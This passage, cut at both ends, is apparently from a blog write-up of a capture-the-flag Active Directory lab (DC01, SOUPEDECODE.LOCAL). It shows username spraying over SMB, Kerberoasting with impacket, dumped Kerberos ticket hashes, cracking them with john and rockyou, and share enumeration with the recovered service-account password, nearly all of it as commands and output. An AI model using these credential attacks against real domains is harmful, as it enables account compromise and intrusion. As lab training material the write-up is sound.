192.168.10.102  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)\nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Enterprise:Enterprise \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Domain:Domain \nSMB                      192.168.10.102  445    
DC01             [+] SOUPEDECODE.LOCAL\\Domain:Domain \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Domain:Domain \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Domain:Domain \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Domain:Domain \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Cert:Cert \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Schema:Schema \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Enterprise:Enterprise \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Group:Group \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Read-only:Read-only \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Cloneable:Cloneable \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Protected:Protected \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Key:Key \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Enterprise:Enterprise \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\RAS:RAS \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Allowed:Allowed \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Denied:Denied \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\DnsAdmins:DnsAdmins \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\DnsUpdateProxy:DnsUpdateProxy \nSMB                      192.168.10.102  445    DC01             [-] SOUPEDECODE.LOCAL\\ybob317:ybob317 
STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n<p>Found one whose credentials have expired! Take a look!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient \/\/192.168.10.102\/IPC$ -U ybob317                                                    \nPassword for [WORKGROUP\\ybob317]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n<p>It has indeed expired, but at least we got one user; next it is time to look at other angles.<\/p>\n<h3>Kerberoasting<\/h3>\n<p>The earlier port scan showed a service port for ticket-based authentication; try to find a relevant tool and scan it!<\/p>\n<pre><code class=\"language-bash\">88\/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-11 03:40:33Z)<\/code><\/pre>\n<p>Reference: <a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-kerberos-88\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-kerberos-88<\/a><\/p>\n<p>Using <a href=\"https:\/\/github.com\/fortra\/impacket\/blob\/master\/examples\/GetUserSPNs.py\">https:\/\/github.com\/fortra\/impacket\/blob\/master\/examples\/GetUserSPNs.py<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ python3 GetUserSPNs.py -h                                    \nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\nusage: GetUserSPNs.py [-h] [-target-domain TARGET_DOMAIN] [-no-preauth NO_PREAUTH] [-stealth] [-usersfile USERSFILE] [-request] [-request-user username] [-save] [-outputfile OUTPUTFILE]\n                      [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-dc-host hostname]\n                      
target\n\nQueries target domain for SPNs that are running under a user account\n\npositional arguments:\n  target                domain[\/username[:password]]\n\noptions:\n  -h, --help            show this help message and exit\n  -target-domain TARGET_DOMAIN\n                        Domain to query\/request if different than the domain of the user. Allows for Kerberoasting across trusts.\n  -no-preauth NO_PREAUTH\n                        account that does not require preauth, to obtain Service Ticket through the AS\n  -stealth              Removes the (servicePrincipalName=*) filter from the LDAP query for added stealth. May cause huge memory consumption \/ errors on large domains.\n  -usersfile USERSFILE  File with user per line to test\n  -request              Requests TGS for users and output them in JtR\/hashcat format (default False)\n  -request-user username\n                        Requests TGS for the SPN associated to the user specified (just the username, no domain needed)\n  -save                 Saves TGS requested to disk. Format is &lt;username&gt;.ccache. Auto selects -request\n  -outputfile OUTPUTFILE\n                        Output filename to write ciphers in JtR\/hashcat format. Auto selects -request\n  -ts                   Adds timestamp to every logging output.\n  -debug                Turn DEBUG output ON\n\nauthentication:\n  -hashes LMHASH:NTHASH\n                        NTLM hashes, format is LMHASH:NTHASH\n  -no-pass              don&#039;t ask for password (useful for -k)\n  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones\n                        specified in the command line\n  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)\n\nconnection:\n  -dc-ip ip address     IP Address of the domain controller. 
If ommited it use the domain part (FQDN) specified in the target parameter. Ignoredif -target-domain is specified.\n  -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ python3 GetUserSPNs.py -dc-ip $IP SOUPEDECODE.LOCAL\/ybob317:ybob317 -request\nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\n[-] Error in bindRequest -&gt; invalidCredentials: 8009030C: LdapErr: DSID-0C0906B0, comment: AcceptSecurityContext error, data 532, v4f7c<\/code><\/pre>\n<p>Then I rescanned this port and found that the clocks were out of sync.<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nmap -sCV -p 88 -Pn $IP\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-10 12:03 EDT\nNmap scan report for soupedecode.local (192.168.10.102)\nHost is up (0.0014s latency).\n\nPORT   STATE SERVICE      VERSION\n88\/tcp open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-11 05:15:06Z)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.28 seconds\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ date\nSat Aug 10 12:05:14 PM EDT 2024<\/code><\/pre>\n<p>The clocks need to be synchronized. I tried several methods without success and could only fall back on someone else's method; below are my failed attempts:<\/p>\n<pre><code class=\"language-bash\"># sudo apt-get install ntpdate -y\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo ntpdate soupedecode.local \n2024-08-11 01:22:30.090816 (-0400) +47467.381814 +\/- 0.000614 soupedecode.local 192.168.10.102 s1 no-leap\nCLOCK: time stepped by 47467.381814\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ date\nSun Aug 11 01:22:33 AM EDT 2024\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nmap -sCV -p 88 -Pn $IP                                                                \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-10 12:11 EDT\nNmap scan report for soupedecode.local (192.168.10.102)\nHost is up (0.0011s latency).\n\nPORT   STATE SERVICE      VERSION\n88\/tcp open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-11 05:22:56Z)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.36 seconds<\/code><\/pre>\n<p>Synchronize using <code>rdate<\/code>:<\/p>\n<pre><code class=\"language-bash\"># sudo apt-get install rdate -y\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo rdate -n 192.168.10.102 \nSun Aug 11 01:28:12 EDT 2024\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nmap -sCV -p 88 -Pn $IP       \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-10 12:17 EDT\nNmap scan report for soupedecode.local (192.168.10.102)\nHost is up (0.0082s latency).\n\nPORT   STATE SERVICE      VERSION\n88\/tcp open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-11 05:28:24Z)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.29 seconds<\/code><\/pre>\n<p>It is still wrong; restart the target machine!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nmap -sCV -p 88 -Pn $IP       \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-10 12:18 EDT\nNmap scan report for soupedecode.local (192.168.10.102)\nHost is up (0.0023s latency).\n\nPORT   STATE SERVICE      VERSION\n88\/tcp open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-11 05:09:22Z)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.29 seconds\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo rdate -n 192.168.10.102\nSun Aug 11 01:09:33 EDT 2024\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo ntpdate soupedecode.local\n2024-08-11 01:09:44.141908 (-0400) +46218.812949 +\/- 0.000751 soupedecode.local 192.168.10.102 s1 no-leap\nCLOCK: time stepped by 46218.812949<\/code><\/pre>\n<p>It looks like there is actually no difference, so just try it like this for now? Still no good:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo python3 GetUserSPNs.py -dc-ip $IP SOUPEDECODE.LOCAL\/ybob317:ybob317 -request\nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\n[-] Error in bindRequest -&gt; invalidCredentials: 8009030C: LdapErr: DSID-0C0906B0, comment: AcceptSecurityContext error, data 532, v4f7c<\/code><\/pre>\n<p>Look up the usage to see whether I am doing something wrong: <a href=\"https:\/\/notes.benheater.com\/books\/active-directory\/page\/getuserspnspy\">https:\/\/notes.benheater.com\/books\/active-directory\/page\/getuserspnspy<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ impacket-GetUserSPNs -dc-ip $IP &#039;soupedecode.local\/ybob317:ybob317&#039;\nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\n[-] Error in bindRequest -&gt; invalidCredentials: 8009030C: LdapErr: DSID-0C0906B0, comment: AcceptSecurityContext error, data 532, 
v4f7c<\/code><\/pre>\n<p>Very strange, I have no clue. Reload the target machine and the attack machine and try once more; if that fails, go to sleep..... Skipping this part for now; it feels like something is misconfigured somewhere.<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient \/\/$IP\/Users -U ybob317\nPassword for [WORKGROUP\\ybob317]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient -L $IP\nPassword for [WORKGROUP\\kali]:\n\n        Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Remote Admin\n        backup          Disk      \n        C$              Disk      Default share\n        IPC$            IPC       Remote IPC\n        NETLOGON        Disk      Logon server share \n        SYSVOL          Disk      Logon server share \n        Users           Disk      \nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 192.168.10.106 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient \/\/$IP\/backup -U file_svc\nPassword for [WORKGROUP\\file_svc]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n<p>They have all expired, burn it all down!!!!! Later I heard the group owner mention that it needs to be updated manually:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257567.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257567.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240816115201938\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p><code>ctrl+alt+del<\/code> (in VirtualBox it is right ctrl+del) to unlock, then press esc to go back one level:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257568.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257568.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240816115723548\" \/><\/div><\/p>\n<p>Switch to the user we obtained and log in to perform the update!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257569.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  
decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257569.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240816115833736\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Then log in with the new password:<\/p>\n<pre><code class=\"language-text\">ybob317317317\nYbob317317317<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257570.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257570.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240816120158998\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Then simply carry on:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo arp-scan -l -I eth1 | grep PCS\n[sudo] password for kali: \n192.168.10.106  08:00:27:80:24:7d       PCS Systemtechnik GmbH\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ IP=192.168.10.106                  \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nmap -sCV -p 88 -Pn $IP \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-16 00:05 EDT\nNmap scan report for 192.168.10.106\nHost is up (0.0015s latency).\n\nPORT   STATE SERVICE      VERSION\n88\/tcp open  
kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-16 19:06:00Z)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 23.26 seconds\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo ntpdate soupedecode.local\nntpdig: no eligible servers\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ tail -n 1 \/etc\/hosts               \n192.168.10.102          soupedecode.local\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo vim \/etc\/hosts           \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo ntpdate soupedecode.local\n2024-08-16 15:06:58.202273 (-0400) +53999.016483 +\/- 0.000783 soupedecode.local 192.168.10.106 s1 no-leap\nCLOCK: time stepped by 53999.016483\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ impacket-GetUserSPNs -dc-ip $IP &#039;soupedecode.local\/ybob317:Ybob317317317&#039;\nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\nServicePrincipalName    Name            MemberOf  PasswordLastSet             LastLogon  Delegation \n----------------------  --------------  --------  --------------------------  ---------  ----------\nFTP\/FileServer          file_svc                  2024-06-17 13:32:23.726085  &lt;never&gt;               \nFW\/ProxyServer          firewall_svc              2024-06-17 13:28:32.710125  &lt;never&gt;               \nHTTP\/BackupServer       backup_svc                2024-06-17 13:28:49.476511  &lt;never&gt;               \nHTTP\/WebServer          web_svc                   2024-06-17 13:29:04.569417  &lt;never&gt;               \nHTTPS\/MonitoringServer  monitoring_svc            2024-06-17 13:29:18.511871  &lt;never&gt; \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ impacket-GetUserSPNs -dc-ip $IP 
&#039;soupedecode.local\/ybob317:Ybob317317317&#039; -request\nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\nServicePrincipalName    Name            MemberOf  PasswordLastSet             LastLogon  Delegation \n----------------------  --------------  --------  --------------------------  ---------  ----------\nFTP\/FileServer          file_svc                  2024-06-17 13:32:23.726085  &lt;never&gt;               \nFW\/ProxyServer          firewall_svc              2024-06-17 13:28:32.710125  &lt;never&gt;               \nHTTP\/BackupServer       backup_svc                2024-06-17 13:28:49.476511  &lt;never&gt;               \nHTTP\/WebServer          web_svc                   2024-06-17 13:29:04.569417  &lt;never&gt;               \nHTTPS\/MonitoringServer  monitoring_svc            2024-06-17 13:29:18.511871  &lt;never&gt;               \n\n[-] CCache file is not found. Skipping...\n[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo rdate -n $IP           \nFri Aug 16 15:09:04 EDT 2024\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ impacket-GetUserSPNs -dc-ip $IP &#039;soupedecode.local\/ybob317:Ybob317317317&#039; -request\nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\nServicePrincipalName    Name            MemberOf  PasswordLastSet             LastLogon  Delegation \n----------------------  --------------  --------  --------------------------  ---------  ----------\nFTP\/FileServer          file_svc                  2024-06-17 13:32:23.726085  &lt;never&gt;               \nFW\/ProxyServer          firewall_svc              2024-06-17 13:28:32.710125  &lt;never&gt;               \nHTTP\/BackupServer       backup_svc                2024-06-17 13:28:49.476511  &lt;never&gt;               \nHTTP\/WebServer          web_svc                   2024-06-17 13:29:04.569417  &lt;never&gt;               \nHTTPS\/MonitoringServer  
monitoring_svc            2024-06-17 13:29:18.511871  &lt;never&gt;               \n\n[-] CCache file is not found. Skipping...\n$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$soupedecode.local\/file_svc*$c81ce3adafb236751d99d0f2de069816$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\n$krb5tgs$23$*firewall_svc$SOUPEDECODE.LOCAL$soupedecode.local\/firewall_svc*$f4c7c2ec54d1f194563376179174baaa$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\n$krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$soupedecode.local\/backup_svc*$496e923b5e34674592aaada0fb125ec7$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\n$krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$soupedecode.local\/web_svc*$969bf48d7346bb1eb51825341ca43ad2$58e9bec68260a352da6bbb6b48af5d0e0df0e6133fa2cf44844fb0d7668000d3fe9b0e40bef6ddb9f13acb14b5907932c892a9634ce92abca074dd8afa408b6dc9c9a44d18ecd54a5dc9a69da41d3d490b51bd6ab54a910e71744bb2d09228640b2a11007e872658fb418f76e88db70eb8778cb09dda6a53783b0d1345b98ade162c0c5106bf957d004aed4482926aa2b4ca2fa036f1e1cbafa23b0508d3a5bcce87fca36d3dc39e00c480dff20b61d768a89f83d2a6c1b036b9780327255907ea050506057b3b972a3072a66553fd15c54a760f095a7b2e18442d9f11f29fad6e174d10535df8107f2c82179f04bd9151b9f02747757bccedd69485c4da6b9bc981addf2287b7b91cb469e4314ada6466ceb035c23c87d77197f66c7a7d7fa11dc1edaadca2c1a58550d2ef4f4361c1b8d7372303bdab9d7d80cf6688b7f90d3c94f874fb095c1c93f9912329cbefebcc782f6564b7ffd6ce702acdf4051a83025ea2b8469188b28c5863299568c3942f4f81ff0ebac7e3c26f159f2b798f4eead3cdf7f47bb012002164b788565fdcfa7d675b88fd0b13cfbaa2f9edd105c9693f2345eec4cf7a1075a465ae12dbfad9d727eec81e8c390decaf18f9e648bc44bcc8763c8fc09dfa31bca7899202d71d445480ba04d0a2e6f11404a75a5e1d8003616efda965cbbbb7f53ef4003accfe0f74ac974ee41673db6961dd3510dfb77ef2e1682af106df318a1e14ee0575278e0dd55fa04a0442840e9a179d64b9e6e5002696a370f2c17bd28512fe15bc0d52bf8e449ecc3145ed1c36d9efee66dee9f2f0b50bb78110fa96599d70105165cd1d4678b5349028941c137cd4100ddf5b6a59434aa16cbe5ef2703100b348b73b8a8a5db2338f5ea75eba1d226a729af3e470
5d8fc5bda6278699e0f6f7f853aabf47ad6cc63019375de2d2a21d5e0560b2aebd43270b624c8f87a4c0e58b303f53a3427690cc4e780dc1beaaa1ccc2ecfa523ce8e40cce117fbd9c7aa764554c3a7b030f820ab803aae30722b244109a6607a187a0683e8da9b6c6377312cb6ef720f64aceccda16d9365192883b90de86235dfbb176d17358b3bb359efa4538578f6531dcf08f26dec7977a419278a97bef6b0c9f3f383bfce1876739e414b16a4a688e86d459976747f519fb06cf9230ceafb34351ebe3f996b2ff77f3c0d34aba8bfa8f26ac65e514c87dc280c63c2232ab3ee099314444ab1852a60e4a1749756ef13203ed8437b69a28fe58e9eb98f8343450fb273a27a5c150091eb96f56eea7658b069e0ced9db3e0f3df37431878e7c6a3daa787f4b0c70d4ddeea7098581225f291cb7f470e198d2cafed22d3d62ba3487a526b9118946e6c3d4881ecac17e7f45620cb64a40fb3508c43c6eba0912a7973d2072057b02e0d573525bc3a1f7254404f2740286009b529e020f3358db55c8e1c24b2c50dd67b3ad3fb435b9896d4af1a95c99ee2f5900853\n$krb5tgs$23$*monitoring_svc$SOUPEDECODE.LOCAL$soupedecode.local\/monitoring_svc*$a21eca5ab03c1524e2eb41b46b1be2af$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<\/code><\/pre>\n<h3>hash\u78b0\u649e<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo rdate -n $IP                                                                        \nFri Aug 16 15:12:03 EDT 2024\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ impacket-GetUserSPNs -dc-ip $IP &#039;soupedecode.local\/ybob317:Ybob317317317&#039; -request &gt; hash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash                                    \nUsing default input encoding: UTF-8\nLoaded 5 password hashes with 5 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nPassword123!!    (?)     
\n1g 0:00:00:38 DONE (2024-08-16 00:13) 0.02597g\/s 372565p\/s 1769Kc\/s 1769KC\/s  0841079575..*7\u00a1Vamos!\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<h3>Gathering information over SMB<\/h3>\n<p>I did not know which username it was, so I tried them one by one and found that none of them worked, then read the writeup:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nxc smb $IP -u file_svc -p &#039;Password123!!&#039;\nSMB         192.168.10.106  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)\nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\file_svc:Password123!! STATUS_PASSWORD_EXPIRED <\/code><\/pre>\n<p>The target machine is misbehaving again..... Change the password....<\/p>\n<pre><code class=\"language-text\">Password123!!!<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nxc smb $IP -u file_svc -p &#039;Password123!!!&#039; \nSMB         192.168.10.106  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)\nSMB         192.168.10.106  445    DC01             [+] SOUPEDECODE.LOCAL\\file_svc:Password123!!! \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nxc smb $IP -u file_svc -p &#039;Password123!!!&#039; --shares\nSMB         192.168.10.106  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)\nSMB         192.168.10.106  445    DC01             [+] SOUPEDECODE.LOCAL\\file_svc:Password123!!! 
\nSMB         192.168.10.106  445    DC01             [*] Enumerated shares\nSMB         192.168.10.106  445    DC01             Share           Permissions     Remark\nSMB         192.168.10.106  445    DC01             -----           -----------     ------\nSMB         192.168.10.106  445    DC01             ADMIN$                          Remote Admin\nSMB         192.168.10.106  445    DC01             backup          READ            \nSMB         192.168.10.106  445    DC01             C$                              Default share\nSMB         192.168.10.106  445    DC01             IPC$            READ            Remote IPC\nSMB         192.168.10.106  445    DC01             NETLOGON        READ            Logon server share \nSMB         192.168.10.106  445    DC01             SYSVOL          READ            Logon server share \nSMB         192.168.10.106  445    DC01             Users                           \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient \/\/$IP\/backup -U file_svc                  